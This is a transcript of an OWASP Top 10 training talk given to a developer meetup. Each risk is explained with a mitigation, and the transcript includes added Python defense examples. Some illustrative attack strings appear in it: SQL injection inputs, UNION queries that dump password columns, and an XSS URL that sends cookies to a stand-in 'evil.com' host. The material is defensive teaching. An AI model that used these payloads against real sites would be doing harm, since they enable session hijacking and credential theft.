The document discusses the top 10 security risks as defined by OWASP: injection, XSS, broken authentication, insecure direct object references, CSRF, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. For each risk, the document explains what it is, why it is a risk, and how it can be mitigated through secure coding practices. The presenter is identified as an Austin OWASP board member who leads security training and runs a security consulting business.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
OWASP Top 10
1. What are they?
Why do attackers use them?
How can we protect against them?
By: Ben Broussard
2. Who is Ben Broussard?
Austin OWASP board member
Fearless leader of OWASP Study Group (free training!)
President of Kedalion Security, LLC.
Background:
BS in Mathematics from UT Austin (crypto)
Mainframe and web app programmer for UT
Web app security interest led to OWASP involvement
OWASP involvement led to Infosec career (Kedalion)
Gymnastics, AI, Braainnsss, Simulations, Kung Fu,
Mathlete, Bboy, Foodie, and more!
3. TOP 10
1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session Management
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards
4. 1. Injection
SQL:
query = "SELECT * FROM table WHERE column = '" + input + "';"
Attacker’s input: x' or 'x'='x
Resulting query: SELECT * FROM table WHERE column = 'x' or 'x'='x';
Other types of injection include XML, Command, and anywhere untrusted input is placed in an eval-like statement.
5. 1. Injection (cont.)
Why: These attacks inject code into the running program. What could the program do? That is what injected code can do.
How: Depends on the platform. Best solution is Parameterized Queries. Don’t treat data like code. Don’t put data in the equivalent of an eval statement.
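As an added example that is not part of the deck, here is the slide's concatenated query beside the parameterized form it recommends, run in Python against a constructed SQLite table so the difference shows up in the rows returned:

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users in an in-memory SQLite table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    # The pattern from the slide: the input is pasted into the SQL text, so the
    # database parses whatever the user typed as part of the statement.
    query = "SELECT * FROM users WHERE name = '" + user_input + "';"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, user_input: str) -> list:
    # Parameterized query: the statement is fixed and the driver binds the value
    # separately, so the input can only ever be compared as data.
    query = "SELECT * FROM users WHERE name = ?;"
    return conn.execute(query, (user_input,)).fetchall()

ATTACK_INPUT = "x' or 'x'='x"   # the payload shown on the slide

def row_counts(user_input: str) -> tuple:
    """Rows returned by the vulnerable and the parameterized version for one input."""
    conn = make_db()
    return (len(lookup_vulnerable(conn, user_input)),
            len(lookup_parameterized(conn, user_input)))

if __name__ == "__main__":
    print("attack input:", row_counts(ATTACK_INPUT))   # (3, 0): every row vs. no row
    print("normal input:", row_counts("alice"))        # (1, 1)
```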
6. 2. Cross-Site Scripting
There are fewer flavors of jelly beans.
Reflected vs Persistent or Stored
Attack could be a link to be clicked on, or part of an open redirect, or any clever scheme the attacker dreams up:
Attack URL:
www.example.com/search?query=<script>document.location = "evil.com?cookie=" + document.cookie;</script>
7. 2. Cross-Site Scripting (cont.)
Why: An attacker can steal cookies and masquerade as the victim, make the victim site look like anything, and take many actions that the victim can, such as submitting forms.
How: Entity encoding. This is how a technical blog shows HTML code without the browser executing that code. ‘<’ becomes ‘&lt;’ and the browser shows it as ‘<’.
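An added Python example, not from the deck: the reflected search page with and without entity encoding, using the script from the slide's attack URL as the search term, plus a parser check showing which elements a browser would actually create from each page.

```python
import html
from html.parser import HTMLParser

# The script from the slide's attack URL, as the server receives the query value.
PAYLOAD = '<script>document.location = "evil.com?cookie=" + document.cookie;</script>'

def render_results_vulnerable(search_term: str) -> str:
    # Reflects the term straight into the page: the browser parses <script> as an
    # element and runs it in the site's origin, with access to document.cookie.
    return "<h1>Results for: " + search_term + "</h1>"

def render_results_encoded(search_term: str) -> str:
    # Entity encoding: '<' -> '&lt;', '>' -> '&gt;', '"' -> '&quot;', '&' -> '&amp;'.
    # The browser renders the characters as text and never sees a script element.
    return "<h1>Results for: " + html.escape(search_term, quote=True) + "</h1>"

class _TagCollector(HTMLParser):
    """Records the element names a browser's parser would create from the page."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def elements_in(page: str) -> list:
    collector = _TagCollector()
    collector.feed(page)
    return collector.tags

def displayed_text(page: str) -> str:
    """Text a user would see inside the <h1> once the browser decodes the entities."""
    inner = page[len("<h1>Results for: "):-len("</h1>")]
    return html.unescape(inner)

if __name__ == "__main__":
    print(elements_in(render_results_vulnerable(PAYLOAD)))   # ['h1', 'script']
    print(elements_in(render_results_encoded(PAYLOAD)))      # ['h1']
```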
8. 3. Broken Authentication and Session Management
This issue is common because it is difficult:
Highly technical, involving cookie intricacies, the request-response model, the same-origin policy, cryptography and more
Attacks include session fixation, cookie generation or brute-forcing, direct browsing, forced logout/lockout, open redirects, cookie capture, CSRF, inadequate logout, password reset/account creation, user enumeration, and much more
9. 3. Broken Authentication and Session Management (cont.)
Why: These attacks allow attackers to take actions as valid users and attack users directly.
How: This is hard. If possible use a standard library. If not, make sure you cover cryptographic cookie strength, a framework that covers all pages that require authentication, noncing, SSL, refreshing the cookie upon login, and pay special attention to account creation, password reset, logout/lockout, and re-login.
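An added Python example, not from the deck, of the session handling the slide lists: a session id from the OS CSPRNG, a fresh id issued at login so a pre-login id never becomes an authenticated one, server-side logout, and an idle timeout. The 15-minute TTL and the cookie attributes are assumptions, not something the slides specify.

```python
import secrets
import time

SESSION_TTL = 15 * 60   # assumed policy: idle sessions expire after 15 minutes

class SessionStore:
    """Minimal server-side session store; session ids are 256-bit random values."""

    def __init__(self):
        self._sessions = {}   # session id -> {"user": name or None, "last_seen": time}

    def create(self, user=None, now=None) -> str:
        # secrets.token_urlsafe(32) draws 32 bytes from the OS CSPRNG: the id is
        # not derived from a timestamp, a counter or user data, so it cannot be
        # predicted or brute-forced ("cryptographic cookie strength").
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user,
                               "last_seen": time.time() if now is None else now}
        return sid

    def login(self, pre_login_sid: str, user: str, now=None) -> str:
        # Refresh the cookie upon login: discard the pre-login id and issue a new
        # one. An id an attacker planted before login (session fixation) therefore
        # never turns into an authenticated session.
        self._sessions.pop(pre_login_sid, None)
        return self.create(user, now)

    def logout(self, sid: str) -> None:
        # Invalidate on the server; deleting the cookie in the browser alone is
        # "inadequate logout", since a captured copy of the cookie keeps working.
        self._sessions.pop(sid, None)

    def user_for(self, sid: str, now=None):
        """Return the logged-in user for sid, or None if unknown, expired or anonymous."""
        now = time.time() if now is None else now
        session = self._sessions.get(sid)
        if session is None:
            return None
        if now - session["last_seen"] > SESSION_TTL:
            self._sessions.pop(sid, None)   # idle timeout
            return None
        session["last_seen"] = now
        return session["user"]

def session_cookie(sid: str) -> str:
    """Set-Cookie value for the session id: Secure keeps it off plaintext HTTP,
    HttpOnly keeps it away from page scripts, SameSite=Lax limits cross-site sends."""
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
```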
10. 4. Insecure Direct Object Reference
www.example.com/cart.php?cartid=413
Change cartid=413 to cartid=412
Due to a lack of Authorization checking
A symptom of trusting the client
Surprisingly common and the easiest vulnerability to exploit
11. 4. Insecure Direct Object Reference (cont.)
Why: An attacker can access other users’ sensitive data and often take actions as other users.
How: Implement proper Authentication and validate user input. This issue implies a lack of developer security training, as it is the most obvious vulnerability, and shows that the developer trusts the client to enforce user actions. Is there a hidden price field, too?
12. 5. Cross-Site Request Forgery
This attack is complex to understand but simple to execute and extremely common.
Pieces:
Cookies are sent with every request to the domain they are set for. This is how login is maintained.
HTML pages cause your browser to make many requests: images, scripts, redirects, iframes, etc.
Your browser can be forced to send a request that takes an action to a domain you are logged into.
13. 5. Cross-Site Request Forgery (cont.)
Why: Attackers can force logged in users to take actions: password update, funds transfer, grant privileges, update direct deposit info, anything
How: Make sure no XSS exists on domain or any subdomains. Implement a nonce system (tied to the user) on forms which take actions. This way, only requests that contain the nonce are valid. Stops an attacker from crafting a valid request to force your browser to make.
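An added example of the nonce system in Python, not code from the deck: the token is an HMAC over the user's session id and the form's action, so it is tied to that user and that form and cannot be produced by a page on another origin. The server key, the transfer form and the handler are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side key; a real deployment loads it from protected config.
SERVER_KEY = secrets.token_bytes(32)

def csrf_token(session_id: str, action: str, key: bytes = SERVER_KEY) -> str:
    # The nonce is an HMAC over the user's session id and the form's action, so
    # it is tied to that user and that form: a token minted for another session
    # or another form does not verify, and nothing has to be stored server-side.
    message = f"{session_id}|{action}".encode()
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify_csrf(session_id: str, action: str, token: str, key: bytes = SERVER_KEY) -> bool:
    expected = csrf_token(session_id, action, key)
    return hmac.compare_digest(expected, token)   # constant-time comparison

def render_transfer_form(session_id: str) -> str:
    """The legitimate form embeds the nonce; a page on another origin cannot read it."""
    token = csrf_token(session_id, "transfer")
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')

def handle_transfer(session_id: str, form: dict) -> str:
    """Server handler for POST /transfer. session_id comes from the cookie, which the
    browser attaches to forged requests as well, which is exactly why the nonce is needed."""
    if not verify_csrf(session_id, "transfer", form.get("csrf_token", "")):
        return "rejected: missing or invalid nonce"
    return f"transferred {form['amount']} to {form['to']}"

if __name__ == "__main__":
    sid = "cookie-session-of-victim"
    legit = {"to": "bob", "amount": "10", "csrf_token": csrf_token(sid, "transfer")}
    forged = {"to": "mallory", "amount": "9999"}   # auto-submitted from another site: no nonce
    print(handle_transfer(sid, legit))    # transferred 10 to bob
    print(handle_transfer(sid, forged))   # rejected: missing or invalid nonce
```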
14. 6. Security Misconfiguration
Examples include:
Default accounts
Lack of SSL
Enabled insecure features (php include, SSI)
Out of date patch levels (IIS 6 or below, old Tomcat)
Web server running as root with execution rights to upload directories
This is a very broad category
15. 6. Security Misconfiguration (cont.)
Why: Often these lead to shell upload and complete compromise, but the vulnerability depends on the misconfigured functionality.
How: Procedures are the answer here. Have a review process for all implemented technologies and a patch process with quick turnover. This category is too broad for a good answer.
16. 7. Insecure Cryptographic Storage
The number one issue here is lack of proper password storage. Plaintext passwords are the opposite of defense in depth.
SQL injection attack to get passwords:
x' UNION SELECT column_name, table_name, null, …, null FROM information_schema.columns WHERE column_name LIKE '%pass%';--
x' UNION SELECT passwd, null, …, null FROM user_details1;--
17. 7. Insecure Cryptographic Storage (cont.)
Why: Sensitive data is an attacker’s goal. If they succeed at their goal of obtaining access, that doesn’t mean they have the data. If it isn’t properly encrypted, then it does.
How: Encrypt sensitive data. Enforce proper key management.
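An added Python example, not from the deck, for the password-storage case the slides single out: a salted, iterated PBKDF2 hash rather than reversible encryption, because the server only ever needs to verify a password, never to recover it, so what a dump like the one on slide 16 returns reveals nothing usable. The iteration count and record format are assumptions.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional

# Assumed parameters (not from the slides): PBKDF2-HMAC-SHA256, 16-byte random
# salt, 200 000 iterations. Prefer scrypt or Argon2 where they are available.
ITERATIONS = 200_000
SALT_LEN = 16

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest."""
    salt = os.urandom(SALT_LEN) if salt is None else salt   # per-user random salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS, dklen=32)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS, base64.b64encode(salt).decode(), base64.b64encode(digest).decode())

def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and parameters and compare."""
    try:
        algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                                 int(iterations), dklen=len(expected))
    return hmac.compare_digest(actual, expected)   # constant-time comparison

def exposed_by_dump(stored: str, password: str) -> bool:
    """What the slide's UNION query would pull out of the table is `stored`; this
    reports whether the password itself is readable in that record."""
    return password in stored

if __name__ == "__main__":
    record = hash_password("correct horse battery")
    print(record)                                        # pbkdf2_sha256$200000$...$...
    print(verify_password("correct horse battery", record))   # True
    print(verify_password("wrong", record))                   # False
```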
18. 8. Failure to Restrict URL Access
This is really failure to validate Authorization on every page.
Most common for static pages which should require Authorization such as access to a blog, sensitive document, or downloadable materials.
Less common for dynamic pages, since user details need to be taken into account to create the dynamic page.
19. 8. Failure to Restrict URL Access (cont.)
Why: Bypassing authorization allows an attacker to take actions or view data they wouldn’t otherwise be able to take. The value of these actions or data is the value of this attack.
How: Implement Authentication validation in a framework sort of way. Page-by-page makes it easy to leave pages out. Opt-out Authorization checking as opposed to opt-in.
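An added Python example that serves both the Insecure Direct Object Reference slides (10 and 11) and the Failure to Restrict URL Access slides (18 and 19); it is not code from the deck. A single dispatcher applies the login check before any handler runs and pages must opt out to be public, the cart handler checks that cartid belongs to the current user, and checkout takes prices from the server rather than from a hidden form field. Routes, carts and prices are constructed.

```python
class AccessDenied(Exception):
    pass

# Constructed sample data. Cart ids are the ones on slide 10; prices live on the
# server so a hidden price field in the form (slide 11) cannot change them.
CARTS = {"413": {"owner": "alice", "items": ["book", "pen"]},
         "412": {"owner": "bob", "items": ["laptop"]}}
PRICES = {"book": 20, "pen": 3, "laptop": 900}

HANDLERS = {}   # path -> (handler, is_public)

def route(path: str, public: bool = False):
    """Register a page. Pages are private unless they opt out with public=True."""
    def register(handler):
        HANDLERS[path] = (handler, public)
        return handler
    return register

def dispatch(path: str, user, params: dict):
    """Single entry point: the login check runs here, before any handler code."""
    if path not in HANDLERS:
        raise AccessDenied("unknown page")        # default deny
    handler, public = HANDLERS[path]
    if not public and user is None:
        raise AccessDenied("login required")      # no page can forget this check
    return handler(user, params)

def owned_cart(user: str, params: dict) -> dict:
    """Object-level authorization: the cart must exist and belong to this user.
    Unknown and foreign carts get the same answer, so ids cannot be probed."""
    cart = CARTS.get(str(params.get("cartid")))
    if cart is None or cart["owner"] != user:
        raise AccessDenied("not your cart")
    return cart

@route("/", public=True)
def home(user, params):
    return "welcome"

@route("/docs/quarterly-report.pdf")
def report(user, params):
    return f"report bytes for {user}"     # static content still goes through dispatch

@route("/cart.php")
def cart(user, params):
    return owned_cart(user, params)["items"]

@route("/checkout")
def checkout(user, params):
    items = owned_cart(user, params)["items"]
    return sum(PRICES[item] for item in items)   # a client-sent "price" is ignored

def request(path: str, user, params: dict):
    """Simulated request; turns AccessDenied into a response string."""
    try:
        return dispatch(path, user, params)
    except AccessDenied as exc:
        return f"403: {exc}"

if __name__ == "__main__":
    print(request("/cart.php", "alice", {"cartid": "413"}))   # ['book', 'pen']
    print(request("/cart.php", "alice", {"cartid": "412"}))   # 403: not your cart
    print(request("/docs/quarterly-report.pdf", None, {}))    # 403: login required
```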
20. 9. Insufficient Transport Layer Protection
Lack of SSL
For request containing credentials
For request to get login page
For any page after login (session cookies, firesheep)
For any page containing authentication details (pre-login session cookie or cart id)
Any time sensitive data is being submitted (sometimes login isn’t required to submit a form, but SSL may be)
Other protocols too: SSH, SFTP, VPN, etc.
21. 9. Insufficient Transport Layer Protection (cont.)
Why: Grabbing cookies allows an attacker to masquerade as a valid user. Grabbing data is pretty much the point.
How: Implement SSL everywhere it is needed, including pre-logon areas if there is a pre-logon session. Disable port 80 if possible. Make sure that cookies have the “Secure” flag on them.
22. 10. Unvalidated Redirects and Forwards
Redirects are a necessity:
Login after session timeout
Many forms validate input and redirect to next step
Retired pages and sites redirect to the new location
If user input is used as the redirection location and can be any location on the Internet, then an attacker can:
Craft a better phishing attack (to deliver malware or gather credentials)
Bypass referer checking for CSRF attacks
23. 10. Unvalidated Redirects and Forwards (cont.)
Why: Plausibility: their phishing attacks contain links to trusted sites. Also, the site may accept requests that it forces users to make more readily.
How: Validate redirection locations. There is rarely cause for a fully dynamic redirect. Use POST requests for requests that take actions or change data (like W3C says to).
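An added Python example, not from the deck, of validating redirect locations: only site-local paths or https URLs on the site's own host pass; scheme-relative, backslash and header-injection forms are rejected; and the preferred keyed form never takes a URL from the client at all. The host name and the redirect table are assumptions.

```python
from urllib.parse import urlparse

SITE_HOST = "www.example.com"    # assumed: the host the slides use in their examples

# Keyed redirects: the client sends a key, never a URL (constructed table).
NAMED_REDIRECTS = {
    "after-login": "/account",
    "old-blog": "/blog",
    "wizard-step-2": "/signup/step2",
}

def is_safe_redirect(target: str) -> bool:
    """Accept a site-local path or an https URL on our own host; reject everything else."""
    if not target or any(c in target for c in "\r\n"):
        return False                 # CR/LF in the value would inject response headers
    if "\\" in target:
        return False                 # browsers treat "/\evil.com" like "//evil.com"
    parsed = urlparse(target)
    if parsed.scheme or parsed.netloc:
        # Absolute or scheme-relative ("//evil.com") URL: only our host, only https.
        # "https://www.example.com@evil.com/" fails too, since its netloc differs.
        return parsed.scheme == "https" and parsed.netloc == SITE_HOST
    return target.startswith("/") and not target.startswith("//")

def redirect_location(target: str, default: str = "/") -> str:
    """Location header value for a user-supplied target, falling back to default."""
    return target if is_safe_redirect(target) else default

def redirect_by_key(key: str, default: str = "/") -> str:
    """Preferred form: look the destination up, so no URL ever comes from the client."""
    return NAMED_REDIRECTS.get(key, default)

if __name__ == "__main__":
    for candidate in ["/account", "//evil.com/login", "https://evil.com/",
                      "https://www.example.com/next", "javascript:alert(1)"]:
        print(candidate, "->", redirect_location(candidate))
```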
24. Questions?
1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session Management
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery (CSRF)
6. Security Misconfiguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufficient Transport Layer Protection
10. Unvalidated Redirects and Forwards